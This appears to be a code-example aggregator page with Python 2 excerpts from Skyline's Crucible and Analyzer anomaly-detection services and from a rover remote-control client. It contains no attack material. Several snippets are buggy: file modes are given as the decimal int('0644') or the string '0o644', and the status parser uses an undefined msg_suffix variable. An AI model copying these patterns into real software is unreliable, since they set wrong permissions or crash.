                graphite_image_file = anomaly_dir + '/' + metric + '.png'
                if 'width' not in image_url:
                    image_url += '&width=586'
                if 'height' not in image_url:
                    image_url += '&height=308'
                if settings.ENABLE_CRUCIBLE_DEBUG:
                    logger.info('graphite image url - %s' % (image_url))
                image_url_timeout = int(connect_timeout)

                image_data = None

                try:
                    image_data = urllib2.urlopen(image_url, timeout=image_url_timeout).read()
                    logger.info('url OK - %s' % (image_url))
                except urllib2.URLError:
                    image_data = None
                    logger.error('error :: url bad - %s' % (image_url))

                if image_data is not None:
                    with open(graphite_image_file, 'w') as f:
                        f.write(image_data)
                    logger.info('retrieved - %s' % (anomaly_graph))
                    if python_version == 2:
                        mode_arg = int('0644')
                    if python_version == 3:
                        mode_arg = '0o644'
                    os.chmod(graphite_image_file, mode_arg)
                else:
                    logger.error('error :: failed to retrieved - %s' % (anomaly_graph))
            else:
                if settings.ENABLE_CRUCIBLE_DEBUG:
                    logger.info('anomaly_graph file exists - %s' % str(anomaly_graph))

            if not os.path.isfile(anomaly_graph):
                logger.error('error :: retrieve failed to surface %s graph from graphite' % (metric))
            else:
                logger.info('graph image exists - %s' % (anomaly_graph))

            # Check if the json exists
            if not os.path.isfile(anomaly_json_gz):
                if not os.path.isfile(anomaly_json):
                    logger.info('surfacing timeseries data for %s from graphite from %s to %s' % (metric, graphite_from, graphite_until))
                    if requests.__version__ >= '2.4.0':
                        use_timeout = (int(connect_timeout), int(read_timeout))
                    else:
                        use_timeout = int(connect_timeout)
                    if settings.ENABLE_CRUCIBLE_DEBUG:
                        logger.info('use_timeout - %s' % (str(use_timeout)))

                    try:
                        r = requests.get(url, timeout=use_timeout)
                        js = r.json()
                        datapoints = js[0]['datapoints']
                        if settings.ENABLE_CRUCIBLE_DEBUG:
                            logger.info('data retrieved OK')
                    except:
                        datapoints = [[None, int(graphite_until)]]
                        logger.error('error :: data retrieval failed')

                    converted = []
                    for datapoint in datapoints:
                        try:
                            new_datapoint = [float(datapoint[1]), float(datapoint[0])]
                            converted.append(new_datapoint)
                        except:
                            continue

                    with open(anomaly_json, 'w') as f:
                        f.write(json.dumps(converted))
                    if python_version == 2:
                        mode_arg = int('0644')
                    if python_version == 3:
                        mode_arg = '0o644'
                    os.chmod(anomaly_json, mode_arg)
                    if settings.ENABLE_CRUCIBLE_DEBUG:
                        logger.info('json file - %s' % anomaly_json)

                if not os.path.isfile(anomaly_json):
                    logger.error('error :: failed to surface %s json from graphite' % (metric))
                    # Move metric check file
                    try:
                        shutil.move(metric_check_file, failed_check_file)
                        logger.info('moved check file to - %s' % failed_check_file)
                    except OSError:
                        logger.error('error :: failed to move check file to - %s' % failed_check_file)
                        pass
                    return

        # Check timeseries json exists - raw or gz
        if not os.path.isfile(anomaly_json):
            if not os.path.isfile(anomaly_json_gz):
                logger.error('error :: no json data found' % (metric))
                # Move metric check file
                try:
                    shutil.move(metric_check_file, failed_check_file)
                    logger.info('moved check file to - %s' % failed_check_file)
                except OSError:
                    logger.error('error :: failed to move check file to - %s' % failed_check_file)
                    pass
                return
            else:
                logger.info('timeseries json gzip exists - %s' % (anomaly_json_gz))
        else:
            logger.info('timeseries json exists - %s' % (anomaly_json))

        # If timeseries json and run_crucible_tests is str(False) gzip and
        # return here as there is nothing further to do
        if run_crucible_tests == 'False':
            if settings.ENABLE_CRUCIBLE_DEBUG:
                logger.info('run_crucible_tests - %s' % run_crucible_tests)
            # gzip the json timeseries data
            if os.path.isfile(anomaly_json):
                if settings.ENABLE_CRUCIBLE_DEBUG:
                    logger.info('gzipping - %s' % anomaly_json)
                try:
                    f_in = open(anomaly_json)
                    f_out = gzip.open(anomaly_json_gz, 'wb')
                    f_out.writelines(f_in)
                    f_out.close()
                    f_in.close()
                    os.remove(anomaly_json)
                    if python_version == 2:
                        mode_arg = int('0644')
                    if python_version == 3:
                        mode_arg = '0o644'
                    os.chmod(anomaly_json_gz, mode_arg)
                    if settings.ENABLE_CRUCIBLE_DEBUG:
                        logger.info('gzipped - %s' % anomaly_json_gz)
                    try:
                        os.remove(metric_check_file)
                        logger.info('removed check file - %s' % metric_check_file)
                    except OSError:
                        pass
                    return
                except:
                    logger.error('error :: Failed to gzip data file - %s' % str(traceback.print_exc()))
                    try:
                        os.remove(metric_check_file)
                        logger.info('removed check file - %s' % metric_check_file)
                    except OSError:
                        pass
                    return

            if os.path.isfile(anomaly_json_gz):
                if settings.ENABLE_CRUCIBLE_DEBUG:
                    logger.info('gzip exists - %s' % anomaly_json)
                    try:
                        os.remove(metric_check_file)
                        logger.info('removed check file - %s' % metric_check_file)
                    except OSError:
                        pass
                    return
            nothing_to_do = 'true - for debug only'

        # self.check_if_parent_is_alive()
        # Run crucible algorithms
        logger.info('running crucible tests - %s' % (metric))

        timeseries_dir = metric.replace('.', '/')

        if os.path.isfile(anomaly_json_gz):
            if not os.path.isfile(anomaly_json):
                if settings.ENABLE_CRUCIBLE_DEBUG:
                    logger.info('ungzipping - %s' % anomaly_json_gz)
                try:
                    # with gzip.open(anomaly_json_gz, 'rb') as fr:
                    fr = gzip.open(anomaly_json_gz, 'rb')
                    raw_timeseries = fr.read()
                    fr.close()
                except Exception as e:
                    logger.error('error :: could not ungzip %s - %s' % (anomaly_json_gz, e))
                    traceback.print_exc()
                if settings.ENABLE_CRUCIBLE_DEBUG:
                    logger.info('ungzipped')
                    logger.info('writing to - %s' % anomaly_json)
                with open(anomaly_json, 'w') as fw:
                    fw.write(raw_timeseries)
                if settings.ENABLE_CRUCIBLE_DEBUG:
                    logger.info('anomaly_json done')
                if python_version == 2:
                    mode_arg = int('0644')
                if python_version == 3:
                    mode_arg = '0o644'
                os.chmod(anomaly_json, mode_arg)
        else:
            if settings.ENABLE_CRUCIBLE_DEBUG:
                logger.info('No gzip - %s' % anomaly_json_gz)
            nothing_to_do = 'true - for debug only'

        if os.path.isfile(anomaly_json):
            if settings.ENABLE_CRUCIBLE_DEBUG:
                logger.info('anomaly_json exists - %s' % anomaly_json)

        if os.path.isfile(anomaly_json):
            if settings.ENABLE_CRUCIBLE_DEBUG:
                logger.info('loading timeseries from - %s' % anomaly_json)
            with open(anomaly_json, 'r') as f:
                timeseries = json.loads(f.read())
            if settings.ENABLE_CRUCIBLE_DEBUG:
                logger.info('loaded timeseries from - %s' % anomaly_json)
        else:
            try:
                logger.error('error :: file not found - %s' % anomaly_json)
                shutil.move(metric_check_file, failed_check_file)
                if python_version == 2:
                    mode_arg = int('0644')
                if python_version == 3:
                    mode_arg = '0o644'
                os.chmod(failed_check_file, mode_arg)
                logger.info('moved check file to - %s' % failed_check_file)
            except OSError:
                logger.error('error :: failed to move check file to - %s' % failed_check_file)
                pass
            return

        start_timestamp = int(timeseries[0][0])
        if settings.ENABLE_CRUCIBLE_DEBUG:
            logger.info('start_timestamp - %s' % str(start_timestamp))
        end_timestamp = int(timeseries[-1][0])
        if settings.ENABLE_CRUCIBLE_DEBUG:
            logger.info('end_timestamp - %s' % str(end_timestamp))

        full_duration = end_timestamp - start_timestamp
        if settings.ENABLE_CRUCIBLE_DEBUG:
            logger.info('full_duration - %s' % str(full_duration))

        self.check_if_parent_is_alive()

        run_algorithms_start_timestamp = int(time())
        if settings.ENABLE_CRUCIBLE_DEBUG:
            logger.info('run_algorithms_start_timestamp - %s' % str(run_algorithms_start_timestamp))

        if settings.ENABLE_CRUCIBLE_DEBUG:
            logger.info('run_algorithms - %s,%s,%s,%s,%s,%s' % (metric, str(end_timestamp), str(full_duration), anomaly_json, skyline_app, str(algorithms)))
        try:
            anomalous, ensemble = run_algorithms(timeseries, str(metric), end_timestamp, full_duration, str(anomaly_json), skyline_app, algorithms)
        except:
            logger.error('error :: run_algorithms failed - %s' % str(traceback.print_exc()))

        run_algorithms_end_timestamp = int(time())
        run_algorithms_seconds = run_algorithms_end_timestamp - run_algorithms_start_timestamp

        if settings.ENABLE_CRUCIBLE_DEBUG:
            logger.info('anomalous, ensemble - %s, %s' % (anomalous, str(ensemble)))

        if anomalous:
            if settings.ENABLE_CRUCIBLE_DEBUG:
                logger.info('anomalous - %s' % (anomalous))
            nothing_to_do = 'true - for debug only'

        logger.info('run_algorithms took %s seconds' % str(run_algorithms_seconds))

        # Update anomaly file
        crucible_data = 'crucible_tests_run = "%s"\n' \
                        'crucible_triggered_algorithms = %s\n' \
                        'tested_by = "%s"\n' \
            % (str(run_timestamp), str(ensemble), str(this_host))
        crucible_anomaly_file = '%s/%s.txt' % (anomaly_dir, metric)
        with open(crucible_anomaly_file, 'a') as fh:
            fh.write(crucible_data)
        if python_version == 2:
            mode_arg = int('0644')
        if python_version == 3:
            mode_arg = '0o644'
        os.chmod(crucible_anomaly_file, mode_arg)
        logger.info('updated crucible anomaly file - %s/%s.txt' % (anomaly_dir, metric))

        # gzip the json timeseries data after analysis
        if os.path.isfile(anomaly_json):
            if not os.path.isfile(anomaly_json_gz):
                try:
                    f_in = open(anomaly_json)
                    f_out = gzip.open(anomaly_json_gz, 'wb')
                    f_out.writelines(f_in)
                    f_out.close()
                    f_in.close()
                    os.remove(anomaly_json)
                    if python_version == 2:
                        mode_arg = int('0644')
                    if python_version == 3:
                        mode_arg = '0o644'
                    os.chmod(anomaly_json_gz, mode_arg)
                    logger.info('gzipped - %s' % (anomaly_json_gz))
                except:
                    logger.error('error :: Failed to gzip data file - %s' % str(traceback.print_exc()))
            else:
                os.remove(anomaly_json)

        if run_script:
            if os.path.isfile(run_script):
                logger.info('running - %s' % (run_script))
                os.system('%s %s' % (str(run_script), str(crucible_anomaly_file)))

        # Remove metric check file
        try:
            os.remove(metric_check_file)
            logger.info('complete removed check file - %s' % (metric_check_file))
        except OSError:
            pass

    def run(self):
        """
        Called when the process intializes.
        """

        # Log management to prevent overwriting
        # Allow the bin/<skyline_app>.d to manage the log
        if os.path.isfile(skyline_app_logwait):
            try:
                os.remove(skyline_app_logwait)
            except OSError:
                logger.error('error - failed to remove %s, continuing' % skyline_app_logwait)
                pass

        now = time()
        log_wait_for = now + 5
        while now < log_wait_for:
            if os.path.isfile(skyline_app_loglock):
                sleep(.1)
                now = time()
            else:
                now = log_wait_for + 1

        logger.info('starting %s run' % skyline_app)
        if os.path.isfile(skyline_app_loglock):
            logger.error('error - bin/%s.d log management seems to have failed, continuing' % skyline_app)
            try:
                os.remove(skyline_app_loglock)
                logger.info('log lock file removed')
            except OSError:
                logger.error('error - failed to remove %s, continuing' % skyline_app_loglock)
                pass
        else:
            logger.info('bin/%s.d log management done' % skyline_app)

        logger.info('process intialized')

        while 1:
            now = time()
            if settings.ENABLE_CRUCIBLE_DEBUG:
                logger.info('process started - %s' % int(now))

            # Make sure check_dir exists and has not been removed
            try:
                if settings.ENABLE_CRUCIBLE_DEBUG:
                    logger.info('checking check dir exists - %s' % settings.CRUCIBLE_CHECK_PATH)
                os.path.exists(settings.CRUCIBLE_CHECK_PATH)
            except:
                logger.error('error :: check dir did not exist - %s' % settings.CRUCIBLE_CHECK_PATH)
                if python_version == 2:
                    mode_arg = int('0755')
                if python_version == 3:
                    mode_arg = mode=0o755
                os.makedirs(settings.CRUCIBLE_CHECK_PATH, mode_arg)
                logger.info('check dir created - %s' % settings.CRUCIBLE_CHECK_PATH)
                os.path.exists(settings.CRUCIBLE_CHECK_PATH)
                # continue

            # Make sure Redis is up
            try:
                self.redis_conn.ping()
                logger.info('connected to redis at socket path %s' % settings.REDIS_SOCKET_PATH)
            except:
                logger.info('skyline can not connect to redis at socket path %s' % settings.REDIS_SOCKET_PATH)
                sleep(10)
                logger.info('connecting to redis at socket path %s' % settings.REDIS_SOCKET_PATH)
                self.redis_conn = StrictRedis(unix_socket_path=settings.REDIS_SOCKET_PATH)
                continue

            """
            Determine if any metric has been added to test
            """
            while True:

                # Report app up
                self.redis_conn.setex(skyline_app, 120, now)

                metric_var_files = [f for f in listdir(settings.CRUCIBLE_CHECK_PATH) if isfile(join(settings.CRUCIBLE_CHECK_PATH, f))]
#                if len(metric_var_files) == 0:
                if not metric_var_files:
                    logger.info('sleeping 10 no metric check files')
                    sleep(10)

                # Discover metric to analyze
                metric_var_files = ''
                metric_var_files = [f for f in listdir(settings.CRUCIBLE_CHECK_PATH) if isfile(join(settings.CRUCIBLE_CHECK_PATH, f))]
#                if len(metric_var_files) > 0:
                if metric_var_files:
                    break

            metric_var_files_sorted = sorted(metric_var_files)
            metric_check_file = settings.CRUCIBLE_CHECK_PATH + "/" + str(metric_var_files_sorted[0])

            logger.info('assigning check for processing - %s' % str(metric_var_files_sorted[0]))

            # Reset process_list
            self.process_list[:] = []

            # Spawn processes
            pids = []
            spawned_pids = []
            pid_count = 0
            run_timestamp = int(now)
            for i in range(1, CRUCIBLE_PROCESSES + 1):
                p = Process(target=self.spin_process, args=(i, run_timestamp, str(metric_check_file)))
                pids.append(p)
                pid_count += 1
                logger.info('starting %s of %s spin_process/es' % (str(pid_count), str(settings.CRUCIBLE_PROCESSES)))
                p.start()
                spawned_pids.append(p.pid)

            # Send wait signal to zombie processes
            # for p in pids:
            #     p.join()
            # Self monitor processes and terminate if any spin_process has run
            # for longer than CRUCIBLE_TESTS_TIMEOUT
            p_starts = time()
            while time() - p_starts <= settings.CRUCIBLE_TESTS_TIMEOUT:
                if any(p.is_alive() for p in pids):
                    # Just to avoid hogging the CPU
                    sleep(.1)
                else:
                    # All the processes are done, break now.
                    time_to_run = time() - p_starts
                    logger.info('%s :: %s spin_process/es completed in %.2f seconds' % (skyline_app, str(settings.CRUCIBLE_PROCESSES), time_to_run))
                    break
            else:
                # We only enter this if we didn't 'break' above.
                logger.info('%s :: timed out, killing all spin_process processes' % (skyline_app))
                for p in pids:
                    p.terminate()
                    p.join()

            while os.path.isfile(metric_check_file):
                sleep(1)
Ejemplo n.º 41
0
class ClientSession():
    """ Manager object that manages the other subprocesses (comms, commands)
    and interfaces the GUI. This is NOT a process !"""

    def __init__(self,cfg,**kwargs):

        ##### Fetch basic args ######
       
        self.cfg = cfg


        ### log queue is provided by the caller
        self.queue_log = kwargs['queue_log']
        self.queue_console = kwargs['queue_console']
        
        ################################
        ### Session logic objects
        ################################

        self.dict_dispatch_rx = {}

        self.rover_status = {'headlights':False, \
                             'speed':0,\
                             'battery':100.0,\
                             'list_audio_files':[]}

        ################################
        ### Rover control objects
        ################################

        self.dict_rover_drive = {'stop':'DG5',\
                                 'north':'DG8',\
                                 'north_east':'DG9',\
                                 'east':'DG6', \
                                 'south_east':'DG3', \
                                 'south':'DG2', \
                                 'south_west':'DG1', \
                                 'west':'DG4', \
                                 'north_west':'DG7'}
        
        
    def init_multiprocessing(self):

        ######### Multiprocessing #########

        self.events = {}
        self.pipes = {}
        self.locks = {}
        self.queues = {}
        self.managers = {}
        
        
        ######## Events/Sync #########

        self.pipes['comms'] = Pipe()

        self.queues['cmd'] = JoinableQueue()
        self.queues['rx'] = JoinableQueue()
        self.queues['tx'] = JoinableQueue()
        self.queues['log'] = self.queue_log
        self.managers['videoframes'] = Manager().list()

        self.events['comms_enable'] = Event()
        self.events['comms_server_disconnect'] = Event()

        self.drive_lifo = Manager().list()


        ##############################
        ### Processes 
        ##############################

        #### Video : ####
        #self.videoproc = VideoProcess()


        #### Comms : ####
        self.commprocess = CommProcess(events={'enable':self.events['comms_enable'], 'server_disconnect':self.events['comms_server_disconnect']}, \
                                       queues={'log':self.queues['log'],'tx':self.queues['tx'], 'rx':self.queues['rx']},\
                                       pipes={'session':self.pipes['comms'][1]}, \
                                       tx_lifo=self.drive_lifo,
                                       rover_address=self.cfg.network.address,\
                                       rover_port_command=self.cfg.network.port_command)


    #################################
    ## Logging / support
    #################################

    def queue_to_log(self, msg):
        self.queues['log'].put(msg)

    def queue_to_console(self, msg):
        self.queue_console.put(msg)
        
    def queue_to_log_and_console(self, msg):
        self.queue_to_log(msg)
        self.queue_to_console(msg)
        
    #################################
    ## COMMS METHODS
    #################################
        
       
    def comms_launch_process(self):
        try:
            self.commprocess.start()
        except Exception as e:
            msg= 'error:could not launch Comms process : %s\n'%e
            self.queue_to_log(msg)
            self.events['comms_server_disconnect'].set()
            return False, msg
        
        msg = 'Comms process successfully launched.\n'
        return True, msg
    
    def comms_flush_rxtx_queues(self):
        while self.queues['rx'].empty()==False:
            self.queues['rx'].get()
        while self.queues['tx'].empty()==False:
            self.queues['tx'].get()
    
    def comms_enable(self):
        msg = 'Attempting connection to rover (%s,%s) ...\n'%(self.cfg.network.address,self.cfg.network.port_command)
        self.events['comms_enable'].set()

        ### Wait for status update from commprocess :
        result, msg = self.pipes['comms'][0].recv()

        if result == True:
            msg = 'Successfully connected to rover.\n'
            retbool = True
        else:
            msg = 'Error:could not connect to rover: %s\n'%msg.strip()
            self.events['comms_enable'].clear()
            retbool = False

        return retbool, msg         
                
    def comms_close(self):
        self.events['comms_enable'].clear()
        if self.commprocess.is_alive():
            self.commprocess.join()

        self.comms_flush_rxtx_queues()
        
        msg = 'Connection to rover closed.\n'
        self.queues['log'].put(msg)
        self.queue_console.put(msg)
        

    def comms_push_command(self, cmdstring):
        ### clean the command first
        cmd=cmdstring.strip()
        self.queues['tx'].put(cmd)

    def comms_push_drive_lifo(self, cmdstring):
        self.drive_lifo.append(cmdstring)

        
    def comms_fetch_rx(self):
        reslist = []
        count = 0
        while (count < FETCH_RX_BURST_SIZE) and (self.queues['rx'].empty()==False):
            reslist.append(self.queues['rx'].get())
            self.queues['rx'].task_done()
            count += 1
        return reslist

    ####################################################
    ## Session logic
    ####################################################
    
    def msgtreat_status(self, message):
        ## it's a status message:
        msg_body = message[1:]
        malformed=None
        if len(msg_suffix)>0:
            
            ## battery ?
            if msg_suffix[0] == 'B':
                battery_str = msg_body[:1]
                if battery_str:
                    self.rover_status['battery'] = float(msg_body[1:])
                else:
                    ## malformed battery status command :
                    malformed = "warning:malformed battery status message:\"%s\"\n"%message
                
            ## speed ?
            if msg_suffix[0] == 'S':
                speed_setting_str = msg_body[1:]
                if speed_setting_str:
                    self.rover_status['speed'] = int(speed_setting_str)
                else:
                    malformed = "warning:malformed speed setting status message:\"%s\"\n"%message
            
            ## headlights ?
            if msg_suffix[0] == 'H':
                headlight_str = msg_body[1:]
                if headlight_str:
                    headlight = headlight=='1'
                    self.rover_status['headlights']=headlight
                else:
                    malformed = "warning:malformed headlights status message:\"%s\"\n"%message

            
        if malformed is not None:
            self.queue_to_log_and_console(malformed)
            

    def msgtreat_default(self, message):
        ## by default, send it to the console queue
        self.queue_console.put(message)
    
    def analyze_received_messages(self,list_messages):
        ret=True
        for message in list_messages:
            if len(message)>0:
                msg0 = message[0]
                if msg0 in self.dict_dispatch_rx:
                    self.dict_dispatch_rx[msg0](message)
                else:
                    self.msgtreat_default(message)
            else:
                self.queue_to_log_and_console("warning: empty message received from rover:\"%s\"\n")
                ret=False

        return ret
            


    ####################################################
    ## Rover controls 
    ####################################################

    ##### Status / Accessory
    
    def rover_request_status_update(self):
        self.comms_push_command('SU')
        
    def rover_headlights_on(self):
        self.comms_push_command('H1')

    def rover_headlights_off(self):
        self.comms_push_command('H0')

    ##### Drive

    def rover_drive(self,where='stop'):
        #print "push command ",where
        self.comms_push_command(self.dict_rover_drive[where])
        #self.comms_push_drive_lifo(self.dict_rover_drive[where])
        
    def rover_flush_drive_lifo(self,keep=1):
        if keep==0:
            self.drive_lifo = []
        else:
            self.drive_lifo = self.drive_lifo[:-keep]
    
    ####################################################
    ## GUI Controls
    ####################################################

    def fetch_rx(self):
        reslist = []
        count = 0
        while (count < FETCH_RX_BURST_SIZE) and (self.queues['rx'].empty()==False):
            reslist.append(self.queues['rx'].get())
            self.queues['rx'].task_done()
            count += 1
        return reslist

    def fetch_console_messages(self):
        res=[]
        while self.queue_console.empty()==False:
            print 'something in console'
            res.append(self.queue_console.get())
            self.queue_console.task_done()
        return res

    def fetch_status_updates(self):
        pass

    def is_rover_connected(self):
        if self.events['comms_enable'].is_set():
            return not self.events['comms_server_disconnect'].is_set()
        else:
            return False
        
    
    def close(self):
        self.events['comms_enable'].clear()
        self.comms_flush_rxtx_queues()
        self.comms_close()
Ejemplo n.º 42
0
class Analyzer(Thread):
    """
    The Analyzer class which controls the analyzer thread and spawned processes.
    """

    def __init__(self, parent_pid):
        """
        Initialize the Analyzer

        Create the :obj:`self.anomalous_metrics` list

        Create the :obj:`self.exceptions_q` queue

        Create the :obj:`self.anomaly_breakdown_q` queue

        """
        super(Analyzer, self).__init__()
        self.redis_conn = StrictRedis(unix_socket_path=settings.REDIS_SOCKET_PATH)
        self.daemon = True
        self.parent_pid = parent_pid
        self.current_pid = getpid()
        self.anomalous_metrics = Manager().list()
        self.exceptions_q = Queue()
        self.anomaly_breakdown_q = Queue()
        self.mirage_metrics = Manager().list()

    def check_if_parent_is_alive(self):
        """
        Self explanatory
        """
        try:
            kill(self.current_pid, 0)
            kill(self.parent_pid, 0)
        except:
            exit(0)

    def send_graphite_metric(self, name, value):
        """
        Sends the skyline_app metrics to the `GRAPHITE_HOST` if a graphite
        host is defined.
        """
        if settings.GRAPHITE_HOST != '':

            skyline_app_metric = skyline_app_graphite_namespace + name

            sock = socket.socket()
            sock.settimeout(10)

            # Handle connection error to Graphite #116 @etsy
            # Fixed as per https://github.com/etsy/skyline/pull/116 and
            # mlowicki:etsy_handle_connection_error_to_graphite
            # Handle connection error to Graphite #7 @ earthgecko
            # merged 1 commit into earthgecko:master from
            # mlowicki:handle_connection_error_to_graphite on 16 Mar 2015
            try:
                sock.connect((settings.GRAPHITE_HOST, settings.CARBON_PORT))
                sock.settimeout(None)
            except socket.error:
                sock.settimeout(None)
                endpoint = '%s:%d' % (settings.GRAPHITE_HOST,
                                      settings.CARBON_PORT)
                logger.error("Can't connect to Graphite at %s" % endpoint)
                return False

            # For the same reason as above
            # sock.sendall('%s %s %i\n' % (name, value, time()))
            try:
                sock.sendall('%s %s %i\n' % (skyline_app_metric, value, time()))
                sock.close()
                return True
            except:
                endpoint = '%s:%d' % (settings.GRAPHITE_HOST,
                                      settings.CARBON_PORT)
                logger.error("Can't connect to Graphite at %s" % endpoint)
                return False

        return False

    def spin_process(self, i, unique_metrics):
        """
        Assign a bunch of metrics for a process to analyze.

        Multiple get the assigned_metrics to the process from Redis.

        For each metric:\n
        * unpack the `raw_timeseries` for the metric.\n
        * Analyse each timeseries against `ALGORITHMS` to determine if it is\n
          anomalous.\n
        * If anomalous add it to the :obj:`self.anomalous_metrics` list\n
        * Add what algorithms triggered to the :obj:`self.anomaly_breakdown_q` queue\n

        Add keys and values to the queue so the parent process can collate for:\n
        * :py:obj:`self.anomaly_breakdown_q`
        * :py:obj:`self.exceptions_q`
        """

        spin_start = time()
        logger.info('spin_process started')

        # Discover assigned metrics
        keys_per_processor = int(ceil(float(len(unique_metrics)) / float(settings.ANALYZER_PROCESSES)))
        if i == settings.ANALYZER_PROCESSES:
            assigned_max = len(unique_metrics)
        else:
            assigned_max = min(len(unique_metrics), i * keys_per_processor)
        # Fix analyzer worker metric assignment #94
        # https://github.com/etsy/skyline/pull/94 @languitar:worker-fix
        assigned_min = (i - 1) * keys_per_processor
        assigned_keys = range(assigned_min, assigned_max)
        # assigned_keys = range(300, 310)

        # Compile assigned metrics
        assigned_metrics = [unique_metrics[index] for index in assigned_keys]

        # Check if this process is unnecessary
        if len(assigned_metrics) == 0:
            return

        # Multi get series
        raw_assigned = self.redis_conn.mget(assigned_metrics)

        # Make process-specific dicts
        exceptions = defaultdict(int)
        anomaly_breakdown = defaultdict(int)

        # Distill timeseries strings into lists
        for i, metric_name in enumerate(assigned_metrics):
            self.check_if_parent_is_alive()

            # logger.info('analysing %s' % metric_name)

            try:
                raw_series = raw_assigned[i]
                unpacker = Unpacker(use_list=False)
                unpacker.feed(raw_series)
                timeseries = list(unpacker)

                anomalous, ensemble, datapoint = run_selected_algorithm(timeseries, metric_name)

                # If it's anomalous, add it to list
                if anomalous:
                    base_name = metric_name.replace(settings.FULL_NAMESPACE, '', 1)
                    metric = [datapoint, base_name]
                    self.anomalous_metrics.append(metric)

                    # Get the anomaly breakdown - who returned True?
                    triggered_algorithms = []
                    for index, value in enumerate(ensemble):
                        if value:
                            algorithm = settings.ALGORITHMS[index]
                            anomaly_breakdown[algorithm] += 1
                            triggered_algorithms.append(algorithm)

            # It could have been deleted by the Roomba
            except TypeError:
                # logger.error('TypeError analysing %s' % metric_name)
                exceptions['DeletedByRoomba'] += 1
            except TooShort:
                # logger.error('TooShort analysing %s' % metric_name)
                exceptions['TooShort'] += 1
            except Stale:
                # logger.error('Stale analysing %s' % metric_name)
                exceptions['Stale'] += 1
            except Boring:
                # logger.error('Boring analysing %s' % metric_name)
                exceptions['Boring'] += 1
            except:
                # logger.error('Other analysing %s' % metric_name)
                exceptions['Other'] += 1
                logger.info(traceback.format_exc())

        # Add values to the queue so the parent process can collate
        for key, value in anomaly_breakdown.items():
            self.anomaly_breakdown_q.put((key, value))

        for key, value in exceptions.items():
            self.exceptions_q.put((key, value))

        spin_end = time() - spin_start
        logger.info('spin_process took %.2f seconds' % spin_end)

    def run(self):
        """
        Called when the process intializes.

        Determine if Redis is up and discover the number of `unique metrics`.

        Divide the `unique_metrics` between the number of `ANALYZER_PROCESSES`
        and assign each process a set of metrics to analyse for anomalies.

        Wait for the processes to finish.

        Process the Determine whether if any anomalous metrics require:\n
        * alerting on (and set `EXPIRATION_TIME` key in Redis for alert).\n
        * feeding to another module e.g. mirage.

        Populated the webapp json the anomalous_metrics details.

        Log the details about the run to the skyline log.

        Send skyline.analyzer metrics to `GRAPHITE_HOST`,
        """

        # Log management to prevent overwriting
        # Allow the bin/<skyline_app>.d to manage the log
        if os.path.isfile(skyline_app_logwait):
            try:
                os.remove(skyline_app_logwait)
            except OSError:
                logger.error('error - failed to remove %s, continuing' % skyline_app_logwait)
                pass

        now = time()
        log_wait_for = now + 5
        while now < log_wait_for:
            if os.path.isfile(skyline_app_loglock):
                sleep(.1)
                now = time()
            else:
                now = log_wait_for + 1

        logger.info('starting %s run' % skyline_app)
        if os.path.isfile(skyline_app_loglock):
            logger.error('error - bin/%s.d log management seems to have failed, continuing' % skyline_app)
            try:
                os.remove(skyline_app_loglock)
                logger.info('log lock file removed')
            except OSError:
                logger.error('error - failed to remove %s, continuing' % skyline_app_loglock)
                pass
        else:
            logger.info('bin/%s.d log management done' % skyline_app)

        if not os.path.exists(settings.SKYLINE_TMP_DIR):
            if python_version == 2:
                os.makedirs(settings.SKYLINE_TMP_DIR, 0750)
            if python_version == 3:
                os.makedirs(settings.SKYLINE_TMP_DIR, mode=0o750)

        # Initiate the algorithm timings if Analyzer is configured to send the
        # algorithm_breakdown metrics with ENABLE_ALGORITHM_RUN_METRICS
        algorithm_tmp_file_prefix = settings.SKYLINE_TMP_DIR + '/' + skyline_app + '.'
        algorithms_to_time = []
        if send_algorithm_run_metrics:
            algorithms_to_time = settings.ALGORITHMS

        while 1:
            now = time()

            # Make sure Redis is up
            try:
                self.redis_conn.ping()
            except:
                logger.error('skyline can\'t connect to redis at socket path %s' % settings.REDIS_SOCKET_PATH)
                sleep(10)
                self.redis_conn = StrictRedis(unix_socket_path=settings.REDIS_SOCKET_PATH)
                continue

            # Report app up
            self.redis_conn.setex(skyline_app, 120, now)

            # Discover unique metrics
            unique_metrics = list(self.redis_conn.smembers(settings.FULL_NAMESPACE + 'unique_metrics'))

            if len(unique_metrics) == 0:
                logger.info('no metrics in redis. try adding some - see README')
                sleep(10)
                continue

            # Using count files rather that multiprocessing.Value to enable metrics for
            # metrics for algorithm run times, etc
            for algorithm in algorithms_to_time:
                algorithm_count_file = algorithm_tmp_file_prefix + algorithm + '.count'
                algorithm_timings_file = algorithm_tmp_file_prefix + algorithm + '.timings'
                # with open(algorithm_count_file, 'a') as f:
                with open(algorithm_count_file, 'w') as f:
                    pass
                with open(algorithm_timings_file, 'w') as f:
                    pass

            # Spawn processes
            pids = []
            pid_count = 0
            for i in range(1, settings.ANALYZER_PROCESSES + 1):
                if i > len(unique_metrics):
                    logger.info('WARNING: skyline is set for more cores than needed.')
                    break

                p = Process(target=self.spin_process, args=(i, unique_metrics))
                pids.append(p)
                pid_count += 1
                logger.info('starting %s of %s spin_process/es' % (str(pid_count), str(settings.ANALYZER_PROCESSES)))
                p.start()

            # Send wait signal to zombie processes
            # for p in pids:
            #     p.join()
            # Self monitor processes and terminate if any spin_process has run
            # for longer than 180 seconds
            p_starts = time()
            while time() - p_starts <= 180:
                if any(p.is_alive() for p in pids):
                    # Just to avoid hogging the CPU
                    sleep(.1)
                else:
                    # All the processes are done, break now.
                    time_to_run = time() - p_starts
                    logger.info('%s :: %s spin_process/es completed in %.2f seconds' % (skyline_app, str(settings.ANALYZER_PROCESSES), time_to_run))
                    break
            else:
                # We only enter this if we didn't 'break' above.
                logger.info('%s :: timed out, killing all spin_process processes' % (skyline_app))
                for p in pids:
                    p.terminate()
                    p.join()

            # Grab data from the queue and populate dictionaries
            exceptions = dict()
            anomaly_breakdown = dict()
            while 1:
                try:
                    key, value = self.anomaly_breakdown_q.get_nowait()
                    if key not in anomaly_breakdown.keys():
                        anomaly_breakdown[key] = value
                    else:
                        anomaly_breakdown[key] += value
                except Empty:
                    break

            while 1:
                try:
                    key, value = self.exceptions_q.get_nowait()
                    if key not in exceptions.keys():
                        exceptions[key] = value
                    else:
                        exceptions[key] += value
                except Empty:
                    break

            # Push to panorama
#            if len(self.panorama_anomalous_metrics) > 0:
#                logger.info('to do - push to panorama')

            # Push to crucible
#            if len(self.crucible_anomalous_metrics) > 0:
#                logger.info('to do - push to crucible')

            # Write anomalous_metrics to static webapp directory

            # Using count files rather that multiprocessing.Value to enable metrics for
            # metrics for algorithm run times, etc
            for algorithm in algorithms_to_time:
                algorithm_count_file = algorithm_tmp_file_prefix + algorithm + '.count'
